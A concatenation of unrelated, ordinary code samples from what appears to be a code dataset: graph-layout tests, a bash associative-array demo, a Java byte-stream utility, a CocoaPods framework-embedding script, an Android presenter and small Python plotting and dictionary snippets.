const path = 'test/data/graphvis/'
let i = 0
for (const f of sortedList) {
if (f.match('big(.*).gv')) continue // the parser bug
if (++i > 200) return
if (i < 150) continue
let dg: DrawingGraph
try {
dg = runMDSLayout(join(path, f))
if (dg != null) {
const t: SvgDebugWriter = new SvgDebugWriter('/tmp/pivot' + f + '.svg')
t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
}
} catch (Error) {
console.log(f + ' error:' + Error.message)
expect(1).toBe(0)
}
}
})
xtest('layout 200-250 gv files with MDS', () => {
const path = 'test/data/graphvis/'
let i = 0
for (const f of sortedList) {
if (f.match('big(.*).gv')) continue // the parser bug
if (++i > 250) return
if (i < 200) continue
let dg: DrawingGraph
try {
dg = runMDSLayout(join(path, f))
} catch (Error) {
console.log(f + ' error:' + Error.message)
expect(1).toBe(0)
}
if (dg != null) {
const t: SvgDebugWriter = new SvgDebugWriter('/tmp/pivot' + f + '.svg')
t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
}
}
})
test('layout from 250 and up gv files with MDS', () => {
expect(3).toBe(3)
// const path = 'test/data/graphvis/'
// let i = 0
// for (const f of sortedList) {
// if (f.match('big(.*).gv')) continue // the parser bug
// if (i++ < 250) continueP
// let dg: DrawingGraph
// try {
// dg = runMDSLayout(join(path, f))
// } catch (Error) {
// console.log(f + ' error:' + Error.message)
// expect(1).toBe(0)
// }
// if (dg != null) {
// const t: SvgDebugWriter = new SvgDebugWriter('/tmp/' + f + '_pivot.svg')
// t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
// }
// }
})
|
#!/usr/bin/env bash
# For more information on arrays see:
# https://www.gnu.org/software/bash/manual/html_node/Arrays.html
MIN_VERSION=4
if (( ${BASH_VERSION%%.*} < MIN_VERSION )); then
echo "This script needs bash >= $MIN_VERSION"
exit 1
fi
# Note: this works on bash >= 4
# make 'distros' an associative array
declare -A distros
# Names of Linux Mint versions and its Ubuntu base
distros=(
['nadia']='quantal'
['olivia']='raring'
['petra']='saucy'
['qiana']='trusty'
['rebecca']='trusty'
)
distros["sarah"]="xenial"
distro='petra'
echo "Linux Mint name: '$distro'"
echo "Ubuntu base: '${distros[$distro]}'"
echo
echo "keys: ${!distros[@]}"
echo "values: ${distros[@]}"
echo
get_ubuntu_base() {
[ ${distros[$1]:+abc} ] && echo ${distros[$1]} || echo "unknown"
# Parameter substitution note:
# ${parameter:+alt_value}
# If parameter set, use alt_value, else use null string.
# For a reference on parameter substitution you can see:
# http://tldp.org/LDP/abs/html/parameter-substitution.html
}
echo "${distro}'s base is `get_ubuntu_base $distro`"
|
<reponame>smagill/opensphere-desktop<filename>open-sphere-plugins/open-sensor-hub/src/main/java/io/opensphere/osh/results/video/ByteUtilities.java
package io.opensphere.osh.results.video;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.PushbackInputStream;
/** Byte utilities. */
public final class ByteUtilities
{
/** The buffer size. */
private static final int BUFFER_SIZE = 8192;
/**
* Reads a given number of bytes from the input stream to the output stream.
*
* @param in the input stream
* @param out the output stream
* @param byteCount the number of bytes to read
* @return the number of bytes read
* @throws IOException if a problem occurs reading the stream
*/
public static int readNBytes(InputStream in, OutputStream out, int byteCount) throws IOException
{
int totalBytesRead = 0;
int bytesRead;
byte[] bytes = new byte[BUFFER_SIZE];
while (totalBytesRead < byteCount)
{
bytesRead = in.read(bytes, 0, Math.min(bytes.length, byteCount - totalBytesRead));
if (bytesRead > 0)
{
out.write(bytes, 0, bytesRead);
totalBytesRead += bytesRead;
}
else if (bytesRead == -1)
{
break;
}
}
return totalBytesRead;
}
/**
* Reads the input stream into the output stream until the marker is found.
* The marker is included in the output stream.
*
* @param in the input stream
* @param out the output stream
* @param marker the marker to search for
* @return whether EOF was hit
* @throws IOException if a problem occurs reading the stream
*/
public static boolean readUntilInclusive(PushbackInputStream in, OutputStream out, byte[] marker) throws IOException
{
int bytesRead;
byte[] bytes = new byte[BUFFER_SIZE];
byte[] mostRecentBytes = new byte[marker.length - 1];
while ((bytesRead = in.read(bytes)) != -1)
{
if (bytesRead > 0)
{
int index = indexOf(bytes, bytesRead, marker);
// Found the marker
if (index != -1)
{
int writeLength = index + marker.length;
out.write(bytes, 0, writeLength);
in.unread(bytes, writeLength, bytesRead - writeLength);
break;
}
else
{
byte[] combinedBytes = concat(mostRecentBytes, bytes, Math.min(bytesRead, marker.length - 1));
index = indexOf(combinedBytes, combinedBytes.length, marker);
// Found the marker across chunks
if (index != -1)
{
out.write(bytes, 0, index + 1);
break;
}
else
{
out.write(bytes, 0, bytesRead);
}
}
shift(mostRecentBytes, bytes, bytesRead);
}
}
return bytesRead == -1;
}
/**
* Returns the index of the marker in the given bytes, or -1 if it could not
* be found.
*
* @param bytes the bytes to search through
* @param byteLength the number of bytes to use from the byte array
* @param marker the marker to search for
* @return the index of the marker
*/
static int indexOf(byte[] bytes, int byteLength, byte[] marker)
{
int index = -1;
int length = byteLength - (marker.length - 1);
for (int b = 0; b < length; b++)
{
boolean equals = true;
for (int m = 0; m < marker.length; m++)
{
if (bytes[b + m] != marker[m])
{
equals = false;
break;
}
}
if (equals)
{
return b;
}
}
return index;
}
/**
* Shifts the new bytes into the bytes from the right.
*
* @param bytes the bytes
* @param newBytes the new bytes
* @param newByteLength the number of new bytes to shift in
*/
static void shift(byte[] bytes, byte[] newBytes, int newByteLength)
{
if (newBytes.length >= bytes.length)
{
System.arraycopy(newBytes, newByteLength - bytes.length, bytes, 0, bytes.length);
}
else
{
System.arraycopy(bytes, newByteLength, bytes, 0, bytes.length - newByteLength);
System.arraycopy(newBytes, 0, bytes, bytes.length - newByteLength, newByteLength);
}
}
/**
* Concatenates two byte arrays.
*
* @param b1 the first array
* @param b2 the second array
* @param b2Length the number of bytes from the second array to use
* @return the concatenated array
*/
static byte[] concat(byte[] b1, byte[] b2, int b2Length)
{
byte[] concat = new byte[b1.length + b2Length];
System.arraycopy(b1, 0, concat, 0, b1.length);
System.arraycopy(b2, 0, concat, b1.length, b2Length);
return concat;
}
/** Disallow instantiation. */
private ByteUtilities()
{
}
}
|
#!/bin/sh
set -e
set -u
set -o pipefail
if [ -z ${FRAMEWORKS_FOLDER_PATH+x} ]; then
# If FRAMEWORKS_FOLDER_PATH is not set, then there's nowhere for us to copy
# frameworks to, so exit 0 (signalling the script phase was successful).
exit 0
fi
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
COCOAPODS_PARALLEL_CODE_SIGN="${COCOAPODS_PARALLEL_CODE_SIGN:-false}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
# Used as a return value for each invocation of `strip_invalid_archs` function.
STRIP_BINARY_RETVAL=0
# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")
# Copies and strips a vendored framework
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
# Use filter instead of exclude so missing patterns don't throw errors.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Copies and strips a vendored dSYM
install_dsym() {
local source="$1"
if [ -r "$source" ]; then
# Copy the dSYM into a the targets temp dir.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${DERIVED_FILES_DIR}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${DERIVED_FILES_DIR}"
local basename
basename="$(basename -s .framework.dSYM "$source")"
binary="${DERIVED_FILES_DIR}/${basename}.framework.dSYM/Contents/Resources/DWARF/${basename}"
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"Mach-O dSYM companion"* ]]; then
strip_invalid_archs "$binary"
fi
if [[ $STRIP_BINARY_RETVAL == 1 ]]; then
# Move the stripped file into its final destination.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${DERIVED_FILES_DIR}/${basename}.framework.dSYM\" \"${DWARF_DSYM_FOLDER_PATH}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${DERIVED_FILES_DIR}/${basename}.framework.dSYM" "${DWARF_DSYM_FOLDER_PATH}"
else
# The dSYM was not stripped at all, in this case touch a fake folder so the input/output paths from Xcode do not reexecute this script because the file is missing.
touch "${DWARF_DSYM_FOLDER_PATH}/${basename}.framework.dSYM"
fi
fi
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY}" -a "${CODE_SIGNING_REQUIRED:-}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code_sign_identitiy
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS:-} --preserve-metadata=identifier,entitlements '$1'"
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
code_sign_cmd="$code_sign_cmd &"
fi
echo "$code_sign_cmd"
eval "$code_sign_cmd"
fi
}
# Strip invalid architectures
strip_invalid_archs() {
binary="$1"
# Get architectures for current target binary
binary_archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | awk '{$1=$1;print}' | rev)"
# Intersect them with the architectures we are building for
intersected_archs="$(echo ${ARCHS[@]} ${binary_archs[@]} | tr ' ' '\n' | sort | uniq -d)"
# If there are no archs supported by this binary then warn the user
if [[ -z "$intersected_archs" ]]; then
echo "warning: [CP] Vendored binary '$binary' contains architectures ($binary_archs) none of which match the current build architectures ($ARCHS)."
STRIP_BINARY_RETVAL=0
return
fi
stripped=""
for arch in $binary_archs; do
if ! [[ "${ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary" || exit 1
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
STRIP_BINARY_RETVAL=1
}
if [[ "$CONFIGURATION" == "Debug" ]]; then
install_framework "${BUILT_PRODUCTS_DIR}/Alamofire/Alamofire.framework"
install_framework "${BUILT_PRODUCTS_DIR}/GoogleUtilities/GoogleUtilities.framework"
install_framework "${BUILT_PRODUCTS_DIR}/GzipSwift/Gzip.framework"
install_framework "${BUILT_PRODUCTS_DIR}/Kingfisher/Kingfisher.framework"
install_framework "${BUILT_PRODUCTS_DIR}/NVActivityIndicatorView/NVActivityIndicatorView.framework"
install_framework "${BUILT_PRODUCTS_DIR}/Protobuf/Protobuf.framework"
install_framework "${BUILT_PRODUCTS_DIR}/SCLAlertView/SCLAlertView.framework"
install_framework "${BUILT_PRODUCTS_DIR}/SwiftyJSON/SwiftyJSON.framework"
install_framework "${BUILT_PRODUCTS_DIR}/nanopb/nanopb.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
install_framework "${BUILT_PRODUCTS_DIR}/Alamofire/Alamofire.framework"
install_framework "${BUILT_PRODUCTS_DIR}/GoogleUtilities/GoogleUtilities.framework"
install_framework "${BUILT_PRODUCTS_DIR}/GzipSwift/Gzip.framework"
install_framework "${BUILT_PRODUCTS_DIR}/Kingfisher/Kingfisher.framework"
install_framework "${BUILT_PRODUCTS_DIR}/NVActivityIndicatorView/NVActivityIndicatorView.framework"
install_framework "${BUILT_PRODUCTS_DIR}/Protobuf/Protobuf.framework"
install_framework "${BUILT_PRODUCTS_DIR}/SCLAlertView/SCLAlertView.framework"
install_framework "${BUILT_PRODUCTS_DIR}/SwiftyJSON/SwiftyJSON.framework"
install_framework "${BUILT_PRODUCTS_DIR}/nanopb/nanopb.framework"
fi
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
wait
fi
|
package com.lai.mtc.mvp.presenter;
import com.lai.mtc.api.ComicApi;
import com.lai.mtc.bean.ComicListDetail;
import com.lai.mtc.comm.ApiException;
import com.lai.mtc.comm.HttpRxObserver;
import com.lai.mtc.mvp.base.impl.BasePresenter;
import com.lai.mtc.mvp.contract.ComicsListDetailContract;
import com.lai.mtc.mvp.utlis.ListUtils;
import com.lai.mtc.mvp.utlis.RxUtlis;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.concurrent.TimeUnit;
import javax.inject.Inject;
import io.reactivex.Observable;
import io.reactivex.ObservableEmitter;
import io.reactivex.ObservableOnSubscribe;
import io.reactivex.android.schedulers.AndroidSchedulers;
import io.reactivex.functions.Consumer;
import io.reactivex.functions.Function;
import io.reactivex.schedulers.Schedulers;
/**
* @author Lai
* @time 2017/12/11 17:04
* @describe 漫画详情业务桥梁P
* @see SimplePresenter
*/
public class ComicsListDetailPresenter extends BasePresenter<ComicsListDetailContract.View> implements ComicsListDetailContract.Model {
private ComicApi mComicApi;
@Inject
ComicsListDetailPresenter(ComicApi comicApi) {
mComicApi = comicApi;
}
@Override
public void onDestroy() {
super.onDestroy();
mComicApi = null;
}
@Override
public void getComicById(int id) {
mRootView.showLoading();
mComicApi.getComicById(id)
.compose(RxUtlis.<ComicListDetail>toMain())
.compose(mRootView.<ComicListDetail>bindToLifecycle())
/* .doOnNext(new Consumer<ComicListDetail>() {
@Override
public void accept(ComicListDetail comicListDetail) {
if (comicListDetail != null && !ListUtils.isEmpty(comicListDetail.getChapters())) {
List<ComicListDetail.ChaptersBean> mirrors = comicListDetail.getChapters();
if (mirrors.size() > 52) {
comicListDetail.setShowChapters(new ArrayList<>(mirrors.subList(0, 52)));
comicListDetail.setLastChapters(new ArrayList<>(mirrors.subList(52, mirrors.size())));
}
}
}
})*/
.onErrorResumeNext(new HttpResultFunction<ComicListDetail>())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new HttpRxObserver<>(new HttpRxObserver.IResult<ComicListDetail>() {
@Override
public void onSuccess(ComicListDetail comicListDetail) {
mRootView.showDetail(comicListDetail);
mRootView.hideLoading();
}
@Override
public void onError(ApiException e) {
mRootView.handleError(e);
}
}));
}
@Override
public void reverse(final ComicListDetail comicListDetail) {
mRootView.showLoading();
Observable.create(new ObservableOnSubscribe<ComicListDetail>() {
@Override
public void subscribe(ObservableEmitter<ComicListDetail> e) {
if (comicListDetail != null && !ListUtils.isEmpty(comicListDetail.getChapters())) {
Collections.reverse(comicListDetail.getChapters());
List<ComicListDetail.ChaptersBean> mirrors = comicListDetail.getChapters();
if (mirrors.size() > 52) {
comicListDetail.setShowChapters(new ArrayList<>(mirrors.subList(0, 52)));
comicListDetail.setLastChapters(new ArrayList<>(mirrors.subList(52, mirrors.size())));
}
}
e.onNext(comicListDetail);
}
}).compose(RxUtlis.<ComicListDetail>toMain())
.onErrorResumeNext(new HttpResultFunction<ComicListDetail>())
.subscribe(new HttpRxObserver<>(new HttpRxObserver.IResult<ComicListDetail>() {
@Override
public void onSuccess(ComicListDetail comicListDetail) {
mRootView.hideLoading();
mRootView.reverse(comicListDetail);
}
@Override
public void onError(ApiException e) {
mRootView.handleError(e);
}
}));
}
}
|
dictionary = {
'one': 1,
'two': 2,
'three': 3,
'four': 4,
'five': 5,
'six': 6,
'seven': 7,
'eight': 8,
'nine': 9,
'ten': 10
} |
string = "Hello World"
output = string[5]
print(output) |
"""
Create a radar chart to illustrate the performance of the data-driven methods
"""
from math import pi
import matplotlib.pyplot as plt
import pandas as pd
plt.rc('text', usetex=True)
plt.rcParams.update({'font.size': 14})
df = pd.DataFrame({
'group': ['DD-v2-03','DD-v1-03'],
'nIoU': [0.772, 0.774],
r"$F_\beta$": [0.900, 0.908],
'MCC': [0.842, 0.817],
'TPR': [0.88, 0.90]
})
categories = list(df)[1:]
N = len(categories)
angles = [n / float(N) * 2 * pi for n in range(N)]
angles += angles[:1]
ax = plt.subplot(111, polar=True)
ax.set_theta_offset(pi / 2)
ax.set_theta_direction(-1)
plt.xticks(angles[:-1], categories)
ax.set_rlabel_position(0)
plt.yticks([0.7, 0.8, 0.9], ["0.7","0.8","0.9"], color="grey", size=10)
plt.ylim(0.6,1)
values = df.loc[0].drop('group').values.flatten().tolist()
values += values[:1]
ax.plot(angles,
values,
color = '#FF0000',
linewidth = 2,
label = "DD-v2-03")
values = df.loc[1].drop('group').values.flatten().tolist()
values += values[:1]
ax.plot(angles,
values,
color = '#000000',
linewidth = 2,
label = "DD-v1-03")
plt.legend(loc='upper right', bbox_to_anchor=(0.1, 0.1))
plt.tight_layout()
plt.savefig('dd_radar_chart.pdf')
plt.show()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.